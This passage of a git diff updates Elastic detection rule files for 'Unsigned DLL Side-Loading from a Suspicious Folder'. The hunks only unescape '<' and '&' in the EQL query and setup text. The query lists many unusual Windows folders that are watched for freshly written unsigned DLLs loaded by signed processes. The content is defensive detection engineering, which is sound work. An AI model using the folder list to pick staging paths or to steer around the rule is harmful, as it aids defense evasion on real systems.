\"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n 
\"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", 
\"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n 
\"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json
index 52e3a421466..f8f558ed2fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n 
\"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", 
\"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n 
\"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", 
@@ -68,7 +68,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json
index 59509cfb2d9..a5745611774 100644
--- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_4.json
@@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n 
\"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", 
\"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n 
\"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n 